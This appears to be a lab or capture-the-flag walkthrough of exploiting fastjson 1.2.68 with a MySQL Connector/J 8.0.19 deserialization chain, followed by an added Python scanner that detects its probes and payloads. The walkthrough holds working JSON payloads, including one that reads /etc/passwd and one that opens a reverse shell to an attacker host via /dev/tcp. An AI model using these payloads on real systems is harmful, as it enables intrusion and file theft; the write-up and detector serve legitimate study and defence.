1268-jdbc

Start the environment, visit the site, and capture the request sent by the login form.

Delete the closing brace of the JSON body so that the parser throws an error.

Use the error message to probe the fastjson version:

```json
{
  "@type": "java.lang.AutoCloseable"
```

The version is 1.2.68.

This environment can be exploited with fastjson combined with MySQL JDBC deserialization.

Look up the JDBC dependency; the marker class differs between MySQL connector versions:

```
com.mysql.jdbc.Buffer                                     // mysql-jdbc-5
com.mysql.cj.api.authentication.AuthenticationProvider    // mysql-connector-6
com.mysql.cj.protocol.AuthenticationProvider              // mysql-connector-8
```
```json
{
  "x": {
    "@type": "java.lang.Character"{
      "@type": "java.lang.Class",
      "val": "com.mysql.cj.protocol.AuthenticationProvider"
    }
  }
}
```

(The syntax error after `"java.lang.Character"` is intentional, as with the version probe above: the body is meant to fail parsing and leak information through the error message.)

Testing shows that the MySQL connector version is mysql-connector 8.

According to the author's writeup, mysql-connector 8 is very restrictive: only one version, 8.0.19, is usable, and this environment's mysql-connector happens to be exactly 8.0.19.

Use the tool https://github.com/fnmsd/MySQL_Fake_Server for exploitation.

Start the MySQL fake server.

Try reading a file:
```http
POST /login HTTP/1.1
Host: 192.168.80.53
Content-Length: 869
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
DNT: 1
Content-Type: application/json; charset=UTF-8
Origin: http://192.168.80.53
Referer: http://192.168.80.53/tologin
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=ECE08E72ED63A0332C3FE78110ED7511
Connection: close

{
  "@type": "java.lang.AutoCloseable",
  "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
  "proxy": {
    "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
    "connectionUrl": {
      "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
      "masters": [
        {
          "host": "192.168.80.206"
        }
      ],
      "slaves": [],
      "properties": {
        "host": "192.168.80.206",
        "user": "fileread_/etc/passwd",
        "dbname": "dbname",
        "password": "pass",
        "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
        "autoDeserialize": "true",
        "allowLoadLocalInfile": "true"
      }
    }
  }
}
```

The file can be read.

Use the ysoserial-0.0.6-SNAPSHOT-all.jar provided by the author and upload it into the MySQL_Fake_Server directory; server.py reads it directly from there.

The final payload is as follows:
```json
{
  "@type": "java.lang.AutoCloseable",
  "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
  "proxy": {
    "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
    "connectionUrl": {
      "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
      "masters": [
        {
          "host": "192.168.80.206"
        }
      ],
      "slaves": [],
      "properties": {
        "host": "192.168.80.206",
        "user": "yso_FastJson1_bash -i >& /dev/tcp/192.168.80.206/1234 0>&1",
        "dbname": "dbname",
        "password": "pass",
        "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
        "autoDeserialize": "true",
        "allowLoadLocalInfile": "true"
      }
    }
  }
}
```

Send the payload.

A shell is returned.
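As an added defensive example (not part of the original writeup and not code from MySQL_Fake_Server), the following Python script scans JSON request bodies for the markers of the chain above: the truncated `java.lang.AutoCloseable` version probe, the `java.lang.Class`/`val` class-existence probe, and the Connector/J properties (`autoDeserialize`, `allowLoadLocalInfile`, `queryInterceptors`) that both payloads depend on. The class and property names are taken from the page; the finding tags, the `scan_body`/`verdict` functions and the sample bodies are this example's own, and 192.0.2.10 is a documentation address standing in for the fake server.

```python
import json
import re

# Marker classes of the chain in the writeup: fastjson 1.2.68's AutoCloseable
# autoType bypass plus the MySQL Connector/J ReplicationMySQLConnection gadget.
CHAIN_TYPES = {
    "java.lang.AutoCloseable",
    "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
    "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
    "com.mysql.cj.conf.url.ReplicationConnectionUrl",
}
# Connector/J properties the payload relies on; a login request never needs them.
DANGEROUS_JDBC_PROPS = {"autoDeserialize", "allowLoadLocalInfile", "queryInterceptors"}
# Dependency-probe targets listed in the writeup, one per connector generation.
PROBE_CLASSES = {
    "com.mysql.jdbc.Buffer",
    "com.mysql.cj.api.authentication.AuthenticationProvider",
    "com.mysql.cj.protocol.AuthenticationProvider",
}

TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]*)"')
CLASS_VAL_RE = re.compile(r'"@type"\s*:\s*"java\.lang\.Class"\s*,\s*"val"\s*:\s*"([^"]*)"')
KEY_RE = re.compile(r'"([A-Za-z]+)"\s*:')


def scan_body(body: str) -> list[str]:
    """Return finding tags for one request body; an empty list means nothing suspicious.

    Matching is done on the raw text on purpose: both probes in the writeup are
    deliberately malformed JSON, so a parser-first approach would discard them.
    """
    findings = []
    types = TYPE_RE.findall(body)
    for type_name in types:
        if type_name in CHAIN_TYPES:
            findings.append(f"autotype:{type_name}")
    for class_name in CLASS_VAL_RE.findall(body):
        tag = "class-probe" if class_name in PROBE_CLASSES else "class-lookup"
        findings.append(f"{tag}:{class_name}")
    for key in KEY_RE.findall(body):
        if key in DANGEROUS_JDBC_PROPS:
            findings.append(f"jdbc-property:{key}")
    if types:
        try:
            json.loads(body)
        except ValueError:
            # "@type" inside syntactically broken JSON: the error-message probes.
            findings.append("malformed-json-with-@type")
    return list(dict.fromkeys(findings))  # de-duplicate, keep order


def verdict(body: str) -> str:
    """Block any body with at least one finding; everything else is allowed through."""
    return "block" if scan_body(body) else "allow"


# Constructed sample bodies (not captured traffic); 192.0.2.10 is a documentation address.
SAMPLE_BENIGN = '{"username": "alice", "password": "correct horse battery staple"}'
SAMPLE_VERSION_PROBE = '{"@type": "java.lang.AutoCloseable"'
SAMPLE_CLASS_PROBE = (
    '{"x":{"@type":"java.lang.Character"{"@type":"java.lang.Class",'
    '"val":"com.mysql.cj.protocol.AuthenticationProvider"}}'
)
SAMPLE_JDBC_CHAIN = """{
  "@type": "java.lang.AutoCloseable",
  "@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
  "proxy": {
    "@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
    "connectionUrl": {
      "@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
      "masters": [{"host": "192.0.2.10"}],
      "slaves": [],
      "properties": {
        "host": "192.0.2.10",
        "user": "fileread_/etc/passwd",
        "queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
        "autoDeserialize": "true",
        "allowLoadLocalInfile": "true"
      }
    }
  }
}"""


if __name__ == "__main__":
    for name, body in [
        ("benign login", SAMPLE_BENIGN),
        ("version probe", SAMPLE_VERSION_PROBE),
        ("class probe", SAMPLE_CLASS_PROBE),
        ("jdbc chain", SAMPLE_JDBC_CHAIN),
    ]:
        print(f"{name:14s} {verdict(body):5s} {scan_body(body)}")
```

The matching runs on raw text rather than on parsed JSON because both probes are malformed by design and `json.loads` would reject them before anything could be inspected. On the application side the actual fix is to keep fastjson autoType disabled (safeMode) and never to build JDBC connection properties from client-supplied data; this scanner is the log-pipeline or WAF-side check that catches attempts against hosts where that has not yet been done.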